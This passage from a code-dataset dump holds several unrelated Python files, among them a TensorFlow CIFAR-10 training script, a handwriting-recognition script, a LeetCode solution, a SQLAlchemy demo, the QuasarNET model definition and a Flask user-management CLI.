tf.expand_dims(self.location_vects, axis=0),\n tf.expand_dims(self.bmu_locs, axis=1)), 2), \n 2)\n\n self.neighbourhood_func = tf.exp(tf.divide(tf.negative(tf.cast(\n self.bmu_distance_squares, \"float32\")), tf.multiply(\n tf.square(tf.multiply(radius, self.gaussian_std)), 2)))\n\n self.learning_rate_op = tf.multiply(self.neighbourhood_func, alpha)\n \n self.numerator = tf.reduce_sum(\n tf.multiply(tf.expand_dims(self.learning_rate_op, axis=-1),\n tf.expand_dims(self.input, axis=1)), axis=0)\n\n self.denominator = tf.expand_dims(\n tf.reduce_sum(self.learning_rate_op,axis=0) + float(1e-20), axis=-1)\n\n self.new_weights = tf.div(self.numerator, self.denominator)\n self.update = [tf.assign(self.map, self.new_weights)]\n\n return self.update,tf.reduce_mean(self.grad_pass, 1)\n# ================= LAYER CLASSES =================\n\n# data\nPathDicom = \"../../Dataset/cifar-10-batches-py/\"\nlstFilesDCM = [] # create an empty list\nfor dirName, subdirList, fileList in os.walk(PathDicom):\n for filename in fileList:\n if not \".html\" in filename.lower() and not \".meta\" in filename.lower(): # check whether the file's DICOM\n lstFilesDCM.append(os.path.join(dirName,filename))\n\n# Read the data traind and Test\nbatch0 = unpickle(lstFilesDCM[0])\nbatch1 = unpickle(lstFilesDCM[1])\nbatch2 = unpickle(lstFilesDCM[2])\nbatch3 = unpickle(lstFilesDCM[3])\nbatch4 = unpickle(lstFilesDCM[4])\n\nonehot_encoder = OneHotEncoder(sparse=True)\ntrain_batch = np.vstack((batch0[b'data'],batch1[b'data'],batch2[b'data'],batch3[b'data'],batch4[b'data']))\ntrain_label = np.expand_dims(np.hstack((batch0[b'labels'],batch1[b'labels'],batch2[b'labels'],batch3[b'labels'],batch4[b'labels'])).T,axis=1).astype(np.float64)\ntrain_label = onehot_encoder.fit_transform(train_label).toarray().astype(np.float64)\n\ntest_batch = unpickle(lstFilesDCM[5])[b'data']\ntest_label = np.expand_dims(np.array(unpickle(lstFilesDCM[5])[b'labels']),axis=0).T.astype(np.float64)\ntest_label = onehot_encoder.fit_transform(test_label).toarray().astype(np.float64)\n\n# reshape data\ntrain_batch = np.reshape(train_batch,(len(train_batch),3,32,32))\ntest_batch = np.reshape(test_batch,(len(test_batch),3,32,32))\n\n# rotate data\ntrain_batch = 
np.rot90(np.rot90(train_batch,1,axes=(1,3)),3,axes=(1,2)).astype(np.float64)\ntest_batch = np.rot90(np.rot90(test_batch,1,axes=(1,3)),3,axes=(1,2)).astype(np.float64)\n\n# normalize \ntrain_batch= train_batch/255.0\ntest_batch = test_batch/255.0\n\n# print out the data shape and the max and min value\nprint('------------------------------')\nprint(train_batch.shape)\nprint(train_batch.max())\nprint(train_batch.min())\nprint(train_label.shape)\nprint(train_label.max())\nprint(train_label.min())\nprint(test_batch.shape)\nprint(test_batch.max())\nprint(test_batch.min())\nprint(test_label.shape)\nprint(test_label.max())\nprint(test_label.min())\nprint('------------------------------')\n\n# hyper \nnum_epoch = 3000\nlearning_rate = 0.000001\nbatch_size = 20\nprint_size = 10\ntime_stamp = 3\n\nbeta1,beta2,adam_e = 0.9,0.999,1e-8\n\n# class\nl0 = CNN(3,3,96)\nl1 = RNN_CNN(time_stamp,32,64,5,3,16)\nl2 = CNN(3,64,192)\nl3 = RNN_CNN(time_stamp,64,128,5,3,4)\nl4 = CNN(1,128,10)\n\n# graph\nx = tf.placeholder(shape=[batch_size,32,32,3],dtype=tf.float64)\ny = tf.placeholder(shape=[batch_size,10],dtype=tf.float64)\n\nlayer0 = l0.feedforward(x)\nlayer0_pool = tf.nn.avg_pool(layer0,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\nlayer0_reshape = tf.reshape(layer0_pool,[batch_size,16,16,32,time_stamp])\n\nlayer1_full = [] ; layer1_update = []\nfor current_time_stamp in range(time_stamp):\n layer1_temp,layer1_assign = l1.feedfoward(layer0_reshape[:,:,:,:,current_time_stamp],current_time_stamp)\n layer1_full.append(layer1_temp)\n layer1_update.append(layer1_assign)\nlayer1_ouput =layer1_full[0] + layer1_full[1] + layer1_full[2]\nlayer1_pool = tf.nn.avg_pool(layer1_ouput,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\n\nlayer2 = l2.feedforward(layer1_pool)\nlayer2_pool = tf.nn.avg_pool(layer2,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\nlayer2_reshape = tf.reshape(layer2_pool,[batch_size,4,4,64,time_stamp])\n\nlayer3_full = [] ; layer3_update = []\nfor current_time_stamp in range(time_stamp):\n layer3_temp,layer3_assign = l3.feedfoward(layer2_reshape[:,:,:,:,current_time_stamp],current_time_stamp)\n layer3_full.append(layer3_temp)\n layer3_update.append(layer3_assign)\nlayer3_ouput = layer3_full[0] + layer3_full[1] + layer3_full[2]\n\nlayer4 = l4.feedforward(layer3_ouput)\nlayer4_pool = tf.reduce_mean(layer4,(1,2))\nfinal_soft = tf_softmax(layer4_pool)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=layer4_pool,labels=y))\ncorrect_prediction = tf.equal(tf.argmax(final_soft, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float64))\n\nauto_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# session\nwith tf.Session() as sess:\n\n sess.run(tf.global_variables_initializer())\n \n train_cota,train_acca = 0,0\n train_cot,train_acc = [],[]\n \n test_cota,test_acca = 0,0\n test_cot,test_acc = [],[]\n\n for iter in range(num_epoch):\n\n train_batch,train_label = shuffle(train_batch,train_label)\n\n for batch_size_index in range(0,len(train_batch),batch_size):\n current_batch = train_batch[batch_size_index:batch_size_index+batch_size]\n current_batch_label = train_label[batch_size_index:batch_size_index+batch_size]\n\n sess_result = sess.run([cost,accuracy,auto_train,correct_prediction,layer1_full,\n layer1_update,layer3_full,layer3_update,final_soft,layer4_pool],feed_dict={x:current_batch,y:current_batch_label})\n print(\"Current Iter : \",iter, \" current batch: \",batch_size_index, ' Current cost: ', 
sess_result[0],' Current Acc: ', sess_result[1],end='\\r')\n train_cota = train_cota + sess_result[0]\n train_acca = train_acca + sess_result[1]\n \n for test_batch_index in range(0,len(test_batch),batch_size):\n current_batch = test_batch[test_batch_index:test_batch_index+batch_size]\n current_batch_label = test_label[test_batch_index:test_batch_index+batch_size]\n\n sess_result = sess.run([cost,accuracy,correct_prediction,layer1_full,\n layer1_update,layer3_full,layer3_update,final_soft,layer4_pool],feed_dict={x:current_batch,y:current_batch_label})\n print(\"Current Iter : \",iter, \" current batch: \",test_batch_index, ' Current cost: ', sess_result[0],' Current Acc: ', sess_result[1],end='\\r')\n test_acca = sess_result[1] + test_acca\n test_cota = sess_result[0] + test_cota\n\n if iter % print_size==0:\n print(\"\\n-----------------\")\n print('Train Current cost: ', train_cota/(len(train_batch)/batch_size),' Current Acc: ', train_acca/(len(train_batch)/batch_size),end='\\n')\n print('Test Current cost: ', test_cota/(len(test_batch)/batch_size),' Current Acc: ', test_acca/(len(test_batch)/batch_size),end='\\n')\n print(\"-----------------\")\n\n train_acc.append(train_acca/(len(train_batch)/batch_size))\n train_cot.append(train_cota/(len(train_batch)/batch_size))\n test_acc.append(test_acca/(len(test_batch)/batch_size))\n test_cot.append(test_cota/(len(test_batch)/batch_size))\n test_cota,test_acca = 0,0\n train_cota,train_acca = 0,0\n\n # training done\n plt.figure(figsize=(10, 10))\n plt.plot(range(len(train_acc)),train_acc,color='red',label='acc ovt')\n plt.plot(range(len(train_cot)),train_cot,color='green',label='cost ovt')\n plt.legend()\n plt.title(\"Train Average Accuracy / Cost Over Time\")\n plt.show()\n\n plt.figure(figsize=(10, 10))\n plt.plot(range(len(test_acc)),test_acc,color='red',label='acc ovt')\n plt.plot(range(len(test_cot)),test_cot,color='green',label='cost ovt')\n plt.legend()\n plt.title(\"Test Average Accuracy / Cost Over Time\")\n plt.show()\n\n# -- end code --","sub_path":"NeuralNetwork/Bio_CNN/b_rcnn.py","file_name":"b_rcnn.py","file_ext":"py","file_size_in_byte":26907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436516592","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport cv2\nfrom DataLoader import Batch\nfrom Model import Model, DecoderType\nfrom SamplePreprocessor import preprocess\nimport os\n# from spellchecker import SpellChecker\n\n\nclass FilePaths:\n \"filenames and paths to data\"\n fnCharList = '../model/charList.txt'\n fnInfer = '../out/'\n\ndef infer(model, fnImg):\n \"recognize text in image provided by file path\"\n img = preprocess(cv2.imread(fnImg, cv2.IMREAD_GRAYSCALE), Model.imgSize)\n batch = Batch(None, [img])\n (recognized, probability) = model.inferBatch(batch, True)\n print('Recognized:', '\"' + recognized[0] + '\"')\n print('Probability:', probability[0])\n return recognized[0], probability[0]\n\ndef recognize():\n decoderType = DecoderType.WordBeamSearch\n model = Model(open(FilePaths.fnCharList).read(), decoderType, mustRestore=True)\n folderNumber = 0\n file = open('../out/summary.txt', 'w')\n file.close()\n # spell = SpellChecker()\n if os.path.isdir(FilePaths.fnInfer):\n probability = 0\n count = 0\n while os.path.isdir(FilePaths.fnInfer + str(folderNumber) + '/'):\n folder = FilePaths.fnInfer + str(folderNumber) + '/'\n fileNumber = 0\n while os.path.isfile(folder + str(fileNumber) + '.png'):\n file = folder + str(fileNumber) + 
'.png'\n print(file)\n word, wordProbability = infer(model, os.path.abspath(file))\n probability += wordProbability\n count += 1\n # misspelled = spell.unknown([word])\n file = open('../out/summary.txt', 'a')\n # if len(misspelled) is not 0:\n # for item in misspelled:\n # word = spell.correction(item)\n file.write(word + ' ')\n file.close()\n fileNumber += 1\n folderNumber += 1\n file = open('../out/summary.txt', 'a')\n file.write('\\n')\n file.close()\n probability = probability / count\n print('Average page probability: ', probability*100)\n","sub_path":"linux/src/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211396283","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/storage/storage_cm_handlers.py\nfrom adisp import process\nfrom gui import DialogsInterface\nfrom gui.Scaleform.daapi.view.dialogs.ConfirmModuleMeta import SellModuleMeta\nfrom gui.Scaleform.daapi.view.lobby.storage.storage_helpers import showStorageModuleInfo\nfrom gui.Scaleform.framework.entities.EventSystemEntity import EventSystemEntity\nfrom gui.Scaleform.framework.managers.context_menu import AbstractContextMenuHandler\nfrom gui.Scaleform.locale.MENU import MENU\nfrom gui.shared import events, EVENT_BUS_SCOPE\nfrom helpers import dependency\nfrom skeletons.gui.customization import ICustomizationService\nfrom skeletons.gui.shared import IItemsCache\n\nclass _StorageOptions(object):\n INFORMATION = 'information'\n SELL = 'sell'\n SALE_OPTION = 'saleOption'\n\n\nclass StorageForSellItemCMHandler(AbstractContextMenuHandler, EventSystemEntity):\n itemsCache = dependency.descriptor(IItemsCache)\n service = dependency.descriptor(ICustomizationService)\n\n def __init__(self, cmProxy, ctx=None):\n self._intCD = 0\n self._selected = False\n super(StorageForSellItemCMHandler, self).__init__(cmProxy, ctx, {_StorageOptions.INFORMATION: 'showInformation',\n _StorageOptions.SELL: 'sellItem',\n _StorageOptions.SALE_OPTION: 'changeSaleOption'})\n\n def showInformation(self):\n showStorageModuleInfo(self._intCD)\n\n @process\n def sellItem(self):\n yield DialogsInterface.showDialog(SellModuleMeta(int(self._intCD)))\n\n def changeSaleOption(self):\n self.fireEvent(events.StorageEvent(events.StorageEvent.SELECT_MODULE_FOR_SELL, ctx={'intCD': self._intCD}), scope=EVENT_BUS_SCOPE.LOBBY)\n\n def _generateOptions(self, ctx=None):\n if self._selected:\n label = MENU.cst_item_ctx_menu('prohibitSale')\n else:\n label = MENU.cst_item_ctx_menu('allowSale')\n return [self._makeItem(_StorageOptions.INFORMATION, MENU.cst_item_ctx_menu(_StorageOptions.INFORMATION)), self._makeItem(_StorageOptions.SELL, MENU.cst_item_ctx_menu(_StorageOptions.SELL)), self._makeItem(_StorageOptions.SALE_OPTION, label)]\n\n def _initFlashValues(self, ctx):\n self._intCD = int(ctx.id)\n self._selected = ctx.selected\n","sub_path":"source/res/scripts/client/gui/Scaleform/daapi/view/lobby/storage/storage_cm_handlers.py","file_name":"storage_cm_handlers.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573128706","text":"'''\nTwo City Scheduling\nSolution\nThere are 2N people a company is planning to interview. 
The cost of flying the i-th person to city A is costs[i][0], and the cost of flying the i-th person to city B is costs[i][1].\n\nReturn the minimum cost to fly every person to a city such that exactly N people arrive in each city.\n\n\n\nExample 1:\n\nInput: [[10,20],[30,200],[400,50],[30,20]]\nOutput: 110\nExplanation:\nThe first person goes to city A for a cost of 10.\nThe second person goes to city A for a cost of 30.\nThe third person goes to city B for a cost of 50.\nThe fourth person goes to city B for a cost of 20.\n\nThe total minimum cost is 10 + 30 + 50 + 20 = 110 to have half the people interviewing in each city.\n'''\n\n\nclass Solution(object):\n def twoCitySchedCost(self, costs):\n \"\"\"\n :type costs: List[List[int]]\n :rtype: int\n \"\"\"\n\n # my idea is to order the differences first and then decide\n # how to schedule\n difs = []\n N = len(costs)\n for i in range(N):\n difs.append([abs(costs[i][0] - costs[i][1]), i])\n\n ''' ok, I checked faster answers, so we don;t have to\n create the variable difs, but just directly sort costs based \n on lambda x: abs(x[0] - x[1])\n '''\n\n difs.sort(key=lambda x: x[0], reverse=True)\n\n A = 0;\n B = 0\n sum_cost = 0\n i = 0\n while i < N:\n\n if costs[difs[i][1]][0] < costs[difs[i][1]][1] and A < N // 2:\n A += 1\n sum_cost += costs[difs[i][1]][0]\n elif B < N // 2:\n sum_cost += costs[difs[i][1]][1]\n B += 1\n else:\n sum_cost += costs[difs[i][1]][0]\n i += 1\n\n return sum_cost","sub_path":"leetcode/NewCityScheduling.py","file_name":"NewCityScheduling.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"293946027","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/28 17:16\n# @Author : Py.qi\n# @File : sqlalchemy_expression.py\n# @Software: PyCharm\n\nfrom sqlalchemy import Column,Integer,String\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\n#echo输出详细\nengine = create_engine(\"mysql+pymysql://root:root@localhost:3306/voxel\",max_overflow=5)\nbase=declarative_base() #创建基类\nclass user(base):\n __tablename__ = 'users'\n id = Column(Integer,primary_key=True,autoincrement=True)\n hostname=Column(String(64),unique=False,nullable=False)\n ip_addr=Column(String(56),unique=False,nullable=False)\n port=Column(Integer,default=22)\n#寻找Base的所有子类,按照子类的结构在数据库中生成对应的数据表信息\nbase.metadata.drop_all(engine)\nbase.metadata.create_all(engine)\n\nSession=sessionmaker(bind=engine)\nsession=Session()\n#增,插入单行\nu = user(hostname='zs',ip_addr='333',port=22)\n\nsession.add(u)\n#插入多行\nsession.add_all([user(hostname='ls',ip_addr='111',port=873),\n user(hostname='ww',ip_addr='888',port=23),\n user(hostname='dff',ip_addr='567',port=3306)\n ])\n#写入数据库\nsession.commit()\n\n#删除\nsession.query(user).filter(user.id > 3).delete()\nsession.commit()\n\n#修改\nsession.query(user).filter(user.id == 3).update({'hostname':'feng','port':3389})\nsession.commit()\n\n#查\nret=session.query(user).filter_by(hostname='feng').first()\nprint(ret)\nret = session.query(user).filter_by(hostname='feng').all()\nprint(ret)\n\nret = session.query(user).filter(user.hostname.in_(['sb','bb'])).all()\nprint(ret)\n\n# ret = session.query(User.name.label('name_label')).all()\n# print(ret,type(ret))\n\nret = session.query(user).order_by(user.id).all()\nprint(ret)\n\n# ret = 
session.query(User).order_by(User.id)[1:3]\n\nprint(ret)\nsession.commit()","sub_path":"test/sql_test2.py","file_name":"sql_test2.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"17775141","text":"# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport random\nimport os\nimport time\nimport json\nimport social_bot\nfrom absl import logging\nfrom grocery_ground import GroceryGround\n\n\nclass TestGroceryGround(unittest.TestCase):\n def test_grocery(self):\n with_language = True\n agents = [\n 'pioneer2dx_noplugin', 'pr2_noplugin', 'icub', 'icub_with_hands',\n 'youbot_noplugin'\n ]\n tasks = ['goal', 'kickball']\n with open(\n os.path.join(social_bot.get_model_dir(), \"agent_cfg.json\"),\n 'r') as cfg_file:\n agent_cfgs = json.load(cfg_file)\n for agent_type in agents:\n for task_name in tasks:\n for use_image_obs in [True, False]:\n agent_cfg = agent_cfgs[agent_type]\n if agent_cfg['camera_sensor'] == '' and use_image_obs:\n continue\n logging.info(\"Testing Case: Agent \" + agent_type +\n \", Task \" + task_name + \", UseImage: \" +\n str(use_image_obs))\n env = GroceryGround(\n with_language=with_language,\n use_image_observation=use_image_obs,\n image_with_internal_states=True,\n agent_type=agent_type,\n task_name=task_name)\n step_cnt = 0\n last_done_time = time.time()\n while step_cnt < 500 and (\n time.time() - last_done_time) < 10:\n actions = env._control_space.sample()\n if with_language:\n actions = dict(control=actions, sentence=\"hello\")\n env.step(actions)\n step_cnt += 1\n step_per_sec = step_cnt / (time.time() - last_done_time)\n logging.info(\"Test Passed, FPS: \" + str(step_per_sec))\n env.close()\n\n\nif __name__ == '__main__':\n logging.set_verbosity(logging.INFO)\n unittest.main()\n","sub_path":"python/social_bot/envs/grocery_ground_test.py","file_name":"grocery_ground_test.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"253866997","text":"from __future__ import print_function\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Dense, Activation, BatchNormalization, Flatten, Conv1D, concatenate, Lambda\nfrom tensorflow.keras.models import Model\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.initializers import glorot_uniform, glorot_uniform\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.activations import softmax, relu\n\ndef QuasarNET(input_shape = None, boxes = 13, nlines = 1, reg_conv = 0., reg_fc=0, offset_activation_function='rescaled_sigmoid'):\n\n X_input = Input(input_shape)\n X = X_input\n\n # Set the parameters.\n ## Number of convolutional layers\n nlayers = 4\n ## Number of filters in convolutional layers.\n nfilters_conv = 100\n ## Max number of filters per 
layer.\n nfilters_max = 100\n ## Size of each filter.\n filter_size=10\n ## Stride length.\n strides = 2\n\n # Set up the convolutional layers.\n for stage in range(nlayers):\n ## Convolutional layer with glorot_uniform initial weights, regularised\n ## with an l2 norm (set to 0 by default).\n X = Conv1D(nfilters_conv, filter_size, strides = strides,\n name = 'conv_{}'.format(stage+1),\n kernel_initializer=glorot_uniform(),\n kernel_regularizer=regularizers.l2(reg_conv))(X)\n ## Batch normalise in features (axis=-1).\n X = BatchNormalization(axis=-1)(X)\n ## Apply relu activation.\n X = Activation('relu')(X)\n\n # Set up the final, fully-connected layer, batch normalising and applying a\n # relu activation function.\n X = Flatten()(X)\n X = Dense(nfilters_max, activation='linear', name='fc_common')(X)\n X = BatchNormalization()(X)\n X = Activation('relu', name='fc_activation')(X)\n\n # Build the \"feature detection\" units for each line.\n outputs = []\n X_box = []\n if offset_activation_function=='sigmoid':\n tf_activation_function = 'sigmoid'\n elif offset_activation_function=='rescaled_sigmoid':\n tf_activation_function = 'sigmoid'\n elif offset_activation_function=='linear':\n tf_activation_function = 'linear'\n for i in range(nlines):\n ## Set up the boxes to determine the coarse location of the line.\n X_box_aux = Dense(boxes, activation='sigmoid',\n name='fc_box_{}'.format(i),\n kernel_initializer=glorot_uniform())(X)\n\n ## Set up the offsets to determine the offset within each box.\n X_offset_aux = Dense(boxes, activation=tf_activation_function,\n name='fc_offset_{}'.format(i),\n kernel_initializer=glorot_uniform())(X)\n\n if offset_activation_function in ['rescaled_sigmoid','linear']:\n ## Rescale the offsets to output between -0.1 and 1.1.\n X_offset_aux = Lambda(lambda x:-0.1+1.2*x)(X_offset_aux)\n\n X_box_aux = concatenate([X_box_aux, X_offset_aux],\n name=\"conc_box_{}\".format(i))\n X_box.append(X_box_aux)\n\n for b in X_box:\n outputs.append(b)\n\n # Produce the final model.\n model = Model(inputs=X_input, outputs=outputs, name='QuasarNET')\n\n return model\n\ndef custom_loss(y_true, y_pred):\n # Assert that the predictions have an even number of columns, corresponding\n # to the box confidence and offset for each box.\n assert y_pred.shape[1]%2 == 0\n\n nboxes = y_pred.get_shape().as_list()[1]//2\n\n # Construct the first two terms in the loss (see equation (1) in\n # Busca et al. 2018), relating to the box confidence.\n N1 = tf.math.reduce_sum(y_true[...,0:nboxes], axis=1) + K.epsilon()\n N2 = tf.math.reduce_sum((1-y_true[...,0:nboxes]), axis=1) + K.epsilon()\n loss_class = -tf.math.reduce_sum(y_true[...,0:nboxes]*tf.math.log(K.clip(y_pred[...,0:nboxes], K.epsilon(), 1-K.epsilon())), axis=1)/N1\n loss_class -= tf.math.reduce_sum((1-y_true[...,0:nboxes])*tf.math.log(K.clip(1-y_pred[...,0:nboxes], K.epsilon(), 1-K.epsilon())), axis=1)/N2\n\n # Construct the final term in the loss (see equation (1) in\n # Busca et al. 
2018), relating to the offset within each box.\n offset_true = y_true[...,nboxes:]\n\n offset_pred = y_pred[...,nboxes:]\n doffset = tf.math.subtract(offset_true, offset_pred)\n loss_offset = tf.math.reduce_sum(y_true[...,0:nboxes]*tf.math.square(doffset), axis=1)/N1\n\n return tf.math.add(loss_class, loss_offset)\n","sub_path":"py/quasarnet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"168971257","text":"#!flask/bin/python\n\nimport sys\nimport click\nfrom os import getenv, path\n\nfrom app import db\nfrom app.models import User, Annotation, Collection\n\nfrom flask import json, current_app\nfrom sqlalchemy.exc import IntegrityError\n\n\ndef register_cli(app):\n\n \"\"\" Base Methods \"\"\"\n\n def run_init_db():\n\n try:\n db.create_all()\n click.echo(\"Database initiated!\")\n\n except:\n click.echo(\"Unexpected error: {0}\".format(sys.exc_info()[0]))\n\n def run_drop_db():\n\n if click.confirm(\"WARNING! Drop all databases?\", abort=True):\n\n try:\n db.drop_all()\n click.echo(\"Database erased!\")\n\n except:\n click.echo(\"Unexpected error: {0}\".format(sys.exc_info()[0]))\n\n def run_create_app_user():\n\n user = User(username=getenv(\"USER_USERNAME\"),\n email=getenv(\"USER_EMAIL\"),\n is_admin=False)\n user.validate_password(getenv(\"USER_PASSWORD\"))\n\n try:\n db.session.add(user)\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Created App User!\")\n click.echo(\" \".format(user))\n\n def run_create_app_admin():\n\n user = User(username=getenv(\"ADMIN_USERNAME\"),\n email=getenv(\"ADMIN_EMAIL\"),\n is_admin=True)\n user.validate_password(getenv(\"ADMIN_PASSWORD\"))\n\n try:\n db.session.add(user)\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Created App Admin!\")\n click.echo(\" \".format(user))\n\n def run_create_welcome_annotations():\n\n welcome_json = path.join(current_app.root_path, \"init\", \"welcome.json\")\n\n with open(welcome_json) as f:\n welcome = json.load(f)\n\n Collection.restore(welcome[\"collections\"])\n\n for annotation in welcome[\"annotations\"]:\n\n importing = Annotation()\n importing.deserialize(annotation)\n\n db.session.add(importing)\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n else:\n click.echo(\"Added welcome annotations!\")\n\n def show_current_users():\n\n users = User.query.all()\n click.echo(\"Current users:\")\n click.echo(\"------------------------------\")\n click.echo(users)\n click.echo(\"------------------------------\")\n\n \"\"\" CLI Methods \"\"\"\n\n @app.cli.command(\n name=\"init_db\",\n help=\"Create all tables.\")\n def init_db():\n run_init_db()\n\n @app.cli.command(\n name=\"drop_db\",\n help=\"Drop all tables.\")\n def drop_db():\n run_drop_db()\n\n @app.cli.command(\n name=\"init_beta\",\n help=\"Create default user and welcome 
annotations.\")\n def init_beta():\n run_create_welcome_annotations()\n\n @app.cli.command(\n name=\"create_app_user\",\n help=\"Create app user.\")\n def create_app_user():\n run_create_app_user()\n\n @app.cli.command(\n name=\"create_app_admin\",\n help=\"Create app admin.\")\n def create_app_admin():\n run_create_app_admin()\n\n @app.cli.command(\n name=\"create_welcome_annotations\",\n help=\"Create welcome annotations.\")\n def create_welcome_annotations():\n run_create_welcome_annotations()\n\n @app.cli.command(\n name=\"create_user\",\n help=\"Create single user.\")\n def create_user():\n\n click.echo(\"Create user...\")\n\n username = click.prompt(\"Username\")\n password = click.prompt(\"Password (6-32)\", hide_input=True, confirmation_prompt=True)\n email = click.prompt(\"Email\")\n is_admin = click.prompt(\"Admin?\", type=bool, default=False)\n\n user = User(username=username, email=email, is_admin=is_admin)\n user.validate_password(password)\n\n db.session.add(user)\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Created User!\")\n click.echo(\" \".format(user))\n\n @app.cli.command(\n name=\"delete_user\",\n help=\"Delete single user.\")\n def delete_user():\n\n show_current_users()\n\n click.echo(\"Delete user...\")\n\n username = click.prompt(\"Username\")\n\n user = User.query.filter_by(username=username).first()\n\n if user and click.confirm(\"User exists! Delete user?\", abort=True):\n\n db.session.delete(user)\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Deleted user!\")\n\n else:\n\n click.echo(\"User does not exist!\")\n\n @app.cli.command(\n name=\"edit_user\",\n help=\"Edit single user.\")\n def edit_user():\n\n show_current_users()\n\n click.echo(\"Edit User...\")\n\n username = click.prompt(\"Username\")\n\n user = User.query.filter_by(username=username).first()\n\n if user and click.confirm(\"User exists! 
Edit user?\", abort=True):\n\n if click.confirm(\"Change Username?\"):\n new_username = click.prompt(\"New Username (3-32)\")\n user.username = new_username\n\n if click.confirm(\"Change Password?\"):\n new_password = click.prompt(\"New Password (6-32)\", hide_input=True, confirmation_prompt=True)\n user.validate_password(new_password)\n\n if click.confirm(\"Change Email?\"):\n new_email = click.prompt(\"New Email\")\n user.email = new_email\n\n if click.confirm(\"Change Admin Status?\"):\n new_admin_status = click.prompt(\"New Admin Status?\", type=bool)\n user.is_admin = new_admin_status\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Updated User!\")\n click.echo(\" \".format(user))\n\n else:\n\n click.echo(\"User does not exist!\")\n\n @app.cli.command(\n name=\"generate_new_api_key\",\n help=\"Generate new token.\")\n def generate_new_api_key():\n\n show_current_users()\n\n click.echo(\"Generate new API key...\")\n\n username = click.prompt(\"Username\")\n\n user = User.query.filter_by(username=username).first()\n\n if user and click.confirm(\"User exists! Generate new API Key?\", abort=True):\n\n user.new_api_key()\n click.echo(\"New API Key: {0}\".format(user.api_key))\n\n else:\n\n click.echo(\"User does not exist!\")\n\n @app.cli.command(\n name=\"reset_user\",\n help=\"Erase and re-create user.\")\n def reset_user():\n\n if click.confirm(\"WARNING! Reset user to default?\", abort=True):\n\n # Remove all users\n User.query.delete()\n\n try:\n db.session.commit()\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Removed all users!\")\n\n # Create users\n run_create_app_user()\n\n @app.cli.command(\n name=\"erase_all_annotations\",\n help=\"Erase annotations.\")\n def erase_all_annotations():\n\n if click.confirm(\"WARNING! Reset annotations?\", abort=True):\n\n # Remove all annotations\n for annotation in Annotation.query.all():\n annotation.delete()\n\n try:\n db.session.commit()\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Removed all annotations!\")\n\n @app.cli.command(\n name=\"reset_app\",\n help=\"Drop databases & 